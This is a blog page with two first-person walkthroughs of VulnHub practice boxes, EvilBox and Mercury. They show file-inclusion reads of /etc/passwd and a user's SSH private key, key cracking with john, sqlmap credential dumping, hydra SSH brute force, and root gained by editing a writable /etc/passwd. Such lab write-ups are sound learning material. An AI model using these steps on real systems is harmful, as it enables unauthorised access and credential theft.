Tag: vulnhub

How I took down EvilBox from vulnhub
Overview:
```
Target Machine IP Address: 192.168.56.120
My Machine IP Address: 192.168.56.117
```
Mission:

Boot to Root

1. To get a user and a root flag
2. To get root access

Description:
```
As a preparation for the upcoming CEH practical Exam, I am going to take down this box. It is rated as easy so let me drive into it. Because I want to increase my craving. 
Once I gets comfortable with the easy boxes, I want to go with medium or hard box. By the way, beginning of June, I will be playing medium boxes.
```
Level: Easy
```
Easy
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:

Since the machine spits the IP address directly when it boots, so we don’t have to do anything.

Target IP: 192.168.56.120
```
nmap -sC -sV -p- -Pn 192.168.56.120 -o nmap.log
```
```
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 10:31 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
| 2048 4495500be473a18511ca10ec1ccbd426 (RSA)
| 256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_ 256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.94 seconds
```
Since there is an Apache web server running, so let’s do a scanning (with my favorite tool gobuster and dirsearch. I hope you remember gobuster was not able to detect one important thing that was detected by dirsearch; here is the link to that writeup )
```
gobuster dir -u http://192.168.56.120 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
```
Output
```
dirsearch -u http://192.168.56.120 -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f
```
Output

http://192.168.56.200/robots.txt
```
Hello H4x0r
```
http://192.168.56.200/secret

I was not able to find anything. Let’s check whether there are any files or folders in http://192.168.56.120/secret/
```
gobuster dir -u http://192.168.56.120/secret/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_secret.log
```
Output

Yes, you might see nothing, but that is not because the tool is bad but because remember, we are using different wordlists. (To be honest, I don’t want to miss any)
```
dirsearch -u http://192.168.56.120/secret/ -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f
```
We found something 😉

http://192.168.56.120/secret/evil.php

We need to find the GET parameter in the URL. We could use WFUZZ or ffuf. This time, we shall try FFUF.

Want to know more about FFUF
– https://www.youtube.com/watch?v=aN3Nayvd7FU&ab_channel=InsiderPhD
– https://www.youtube.com/watch?v=iLFkxAmwXF0&ab_channel=codingo
– https://www.youtube.com/watch?v=9Hik0xy9qd0&ab_channel=HackerSploit
```
ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=test_value' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 4242
```
-c colorized output

-r follow redirects (default is set to false)

-u Target URL

-w Wordlist file path and (optional) keyword separated by colon. eg. ‘/path/to/wordlist:KEYWORD’

-ac Automatically calibrate filtering options (default: false)

-fs Filter HTTP response size. Comma separated list of sizes and ranges

It spits lot of gibberish. Therefore, we could change the 4242 to 0 to negate the gibberish. However, it still not giving us any useful information. So all we could do is, let’s try test_value to something like /etc/passwd which we usually use to test whether there is command execution is available.

Let’s try this one.
```
ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 200
```
It does spit out lot of information. Let’s keep -fs 0 to not to show all output (or show only the thing which we found as GET parameter)
```
ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0
```
Output

By the way, this command also does work
```
ffuf -c -r -u 'http://192.168.56.120/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -ac
```
Yippy!! We got the GET parameter. It is command. Let’s try to access the machine through the URL on browser.

view-source:http://192.168.56.120/secret/evil.php?command=/etc/passwd

The machine has command execution problem.

We got a username (mowree; may be we could keep it for sometime, because who knows it could prove useful during later).

Since, we are able to view /etc/passwd, let’s browse around and try to get the user flag (user.txt is my guess, let’s see) Sad. It didn’t work. Since from the nmap result we know that the openssh is running on the victim machine. Let’s check whether we get any keys (you know, the default key name for public key is id_rsa.pub and id_rsa is the default private key).

P.S. I tried to view what is there in the evil.php using php filter function (which is normally used during the LFI attack). Since there is nothing information, so I didn’t mention it here.

view-source:http://192.168.56.120/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php
```
echo "PD9waHAKICAgICRmaWxlbmFtZSA9ICRfR0VUWydjb21tYW5kJ107CiAgICBpbmNsdWRlKCRmaWxlbmFtZSk7Cj8+Cg==" | base64 -d 

<?php
$filename = $_GET['command'];
include($filename);
?>
```
I also tried to check the bash_history (/home/mowree/.bash_history)

view-source:http://192.168.56.120/secret/evil.php?command=/home/mowree/.bash_history

Didn’t found anything useful 🙁

Anyway, good news that we got the private key.

Download the file:
```
curl http://192.168.56.120/secret/evil.php?command=/home/mowree/.ssh/id_rsa -o id_rsa


chmod 600 id_rsa
```
Since, we know the username for the machine is mowree and we got the private key, let’s try whether we can log into the machine through ssh or not.
```
ssh -i id_rsa mowree@192.168.56.120
```
We need to extract the password using john the ripper
```
ssh2john id_rsa > hash

john -w=/usr/share/wordlists/rockyou.txt hash

john --show hash
```
Let’s try the ssh again.
ssh -i id_rsa mowree@192.168.56.120

We got the user flag.

user flag: 56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

Now we need to enumerate (You could do it manually using some of my favorite onliners. However, here it is raining lightly and as soon it stops I am plan to go the school library. So, my plan is to complete the box before I leave. Oh by the way, I am in our apartment’s private study room. This is my second time to visit and play with boxes. It’s too quite and no people around, feels little eerie you know what I mean 🙂 )

I have uploaded the linpeash.sh from my Kali Linux machine.

And I ran the script.
```
bash linpeash.sh
```
passwd file is writeable (which means an easy root). Let’s try to change some entries in the /etc/passwd

First we need a password for user sam (which we never had created. Initially I thought to create a user on the victim machine but you know all system level commands require sudo privilege which is absent for the current user).
```
nano /etc/passwd
```
copy the line of root user (root:x:0:0:root:/root:/bin/bash) and paste it somewhere bottom, for the ease of use.

change the root to sam. Next, we need to replace the x (which is placeholder for the password with our new password)

By the way, generate the password using the following command.
```
openssl passwd HackThePlanet!
```
replace the value ($1$nLNTaLhW$2PHtGQ3xF.ScdoGbq2Lkd0) with the x, in /etc/passwd.

use control+x and press Y, to get out of nano and save the changes.
```
su sam
```
we are root!!

root flag: 36QtXfdJWvdC0VavlPIApUbDlqTsBM

It’s close to 8PM now, I am think whether I should goto library now or just call it a day lol Anyway, see you in the next post 🙂
May 18, 2023
How I took down Mercury
Overview:
```
Target Machine IP Address: 192.168.56.119
My Machine IP Address: 192.168.56.117
```
Mission:

Boot to Root

1. To get root flag
2. To get root access

Description:
```
"Oh no our webserver got compromised. The attacker used an 0day, so we dont know how he got into the admin panel. Investigate that.

This is an OSCP Prep Box, its based on a CVE I recently found. Its on the OSCP lab machines level."
```
Level: Easy/Medium
```
Easy/Medium (Although it was mentioned easy, if you are not familar with pivoting it could be a medium machine. I have done machine in the past which requires PATH change and other pivoting, however, I felt this machine a medium hard for me :( )
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth1 192.168.56.1/24
```
Target IP: 192.168.56.119
```
nmap -sC -sV -p- -Pn 192.168.56.119 -o nmap.log
```
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 a3:d8:4a:89:a9:25:6d:07:c5:3d:76:28:06:ed:d1:c0 (RSA)
| 256 e7:b2:89:05:54:57:dc:02:f4:8c:3a:7c:55:8b:51:aa (ECDSA)
|_ 256 fd:77:07:2b:4a:16:3a:01:6b:e0:00:0c:0a:36:d8:2f (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_ Supported Methods: POST OPTIONS HEAD GET
| http-robots.txt: 1 disallowed entry 
|_/tiki/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 5h29m58s
| nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| UBUNTU<00> Flags: <unique><active>
| UBUNTU<03> Flags: <unique><active>
| UBUNTU<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
```
1. HTTP (8080/tcp)

http://192.168.56.119:8080
```
gobuster dir -u http://192.168.56.119:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster8080.log
```
```
dirsearch -u http://192.168.56.119:8080/ -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f
```
Usually, gobuster gives me pretty much everything available on the vulnerable box, but this time, it really gave me the feeling that I can’t totally “trust” or depend on a single tool. Therefore, I will be using both the gobuster and dirsearch hence forth (on every machine).

By the way, there wasn’t made an entry in the robots.txt by the developer.

Let’s try nikto (many might think it is a very old tool, but I must admit, I love this tool because it had saved me a lot of time. Probably you have seen the walkthroughs I have done have used nikto. Yes, if it works, that counts 😉 )
```
nikto -h 192.168.56.119:8080 > nikto8080.log
```
Output
```
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.119
+ Target Hostname: 192.168.56.119
+ Target Port: 8080
+ Start Time: 2023-05-16 16:01:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: WSGIServer/0.2 CPython/3.8.2
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /SilverStream: SilverStream allows directory listing. See: https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html
+ /static/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ 8103 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2023-05-16 16:02:40 (GMT-4) (66 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
http://192.168.56.119:8080/static/

http://192.168.56.119:8080/SilverStream/

When I visit http://192.168.56.119:8080/mercuryfacts/

I visited both the embedded links and guess what I found?

Yes, I increment the id value (each id, provides you different output in your browser) and I found a SQL injection here.

By the way, I haven’t practiced my SQL injection skillset for quite some time, so I had to read different articles and cheatsheet to brush my rusted skillset lol

This time I am going to rely on SQLMap because I am also preparing for the CEH practical exam. In that exam, SQLMap is allowed. By the way, I like this cheat sheet, which is short and to the point. (Of course, it was not exhaustive so had to find additional materials to properly supplement the missing part of it. https://medium.com/hacker-toolbelt/sqlmap-cheat-sheet-e5a38300b50).
```
sqlmap -u http://192.168.56.119:8080/mercuryfacts/
```
-u URL

The backend is running MySQL.

List databases (–dbs)
```
sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql --dbs
```
We got the database name and the database name is mercury.

List the tables of the database mercury
```
sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql -D mercury --tables
```
-D database to enumerate

–tables enumerate DBMS database tables

There are two tables. facts and users.

Let’s check the table attributes (based on that we could get some information before dumping the table)

Table Name: facts
```
sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql -D mercury -T facts --columns
```
-T Tables to enumerate

–columns Enumerate table columns

Table Name: users
```
sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql -D mercury -T users --columns
```
We can see that there is username and password, which looks really alluring.

Let’s dump the user table.

Dump tables from the database.
```
sqlmap -u http://192.168.56.119:8080/mercuryfacts/ --dbms=mysql -D mercury -T users -dump
```
```
Database: mercury
Table: users
[4 entries]
+----+-------------------------------+-----------+
| id | password                      | username |
+----+-------------------------------+-----------+
| 1 | johnny1987                    | john |
| 2 | lovemykids111                 | laura |
| 3 | lovemybeer111                 | sam |
| 4 | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+
```
Since we know through the NMap scan result that the machine is running SSH, therefore, there is a high chance that either one or more credentials could get us into the machine (or maybe none).

We could do it manually however, I am going to use the Hydra for this. Here is the one-liner, if you are interested to know.
```
hydra -L user.txt -P pass.txt 192.168.56.119 ssh
```
Ok, so the username is webmaster and the password is mercuryisthesizeof0.056Earths to access SSH

I was able to SSH to the machine and I quickly checked whether the webmaster is a sudoer. But no luck 🙁

Anyway, let’s not get too excited. First thing first. Get the user flag and then check all the users (/etc/passwd). And also check whether anything suspicious things lingering. If not, this time I am going to use linpeas.sh (Haven’t used it for quite some time)

User Flag: [user_flag_8339915c9a454657bd60ee58776f4ccd]

There is a note.txt inside the mercury_proj and, the note contains credentials for the user webmaster and linuxmaster (if you check the screenshot, it will make more clear what I mean, because I am a visual person and I think you might be like me and prefer to watch some videos to grasp the concept then some jargons lol)

Yes, I have decoded the base64 encoded credentials. Anyway, let’s try to switch the user (su linuxmaster) to Linux master. And check whether it is a sudoer (or it is any special privileges). If we don’t get anything, then we shall try the Linux kernel version or enumerate whether any binary is enabled with SUID privilege or if there any cron jobs were enabled, etc. (These kinds of things were popping into my mind when I bump into the block. By the way, I get these kinds of feelings or logics through popping more boxes. )

Yes, our guess was right. linuxmaster can run the check_syslog.sh with sudo privilege. However, it was sad to know that it was not as easy as I thought. I had to read a lot. However, this link has discussed the linux privilege escalation through path variables quite well. By the way, I must admit that it really took a toll on me to escalate the privilege because I know the logic nevertheless, I am not able to deliver it. I ended up reading another walkthrough. (Little uneasiness was there however, I told myself I will make a good note and will repeat this machine again sometime later to evaluate whether I got it or not).

Yes, the source of uneasiness is not totally because of ego but it was so simple 🙁 Anyway, it is raining at outside. I am going to shoot 2 CV for a post of internship. I am going to try to find an internship till the end of May. If I don’t get it, then I am not gonna waste my time rather, use the time to take down more boxes (to skill-up myself). That’s all for today 🙂

Have a good one!

Here is the Root Flag:
May 17, 2023

Tag: vulnhub

How I took down EvilBox from vulnhub

Overview:

Mission:

Description:

Level: Easy

Download:

How I took down Mercury

Overview:

Mission:

Description:

Level: Easy/Medium

Download: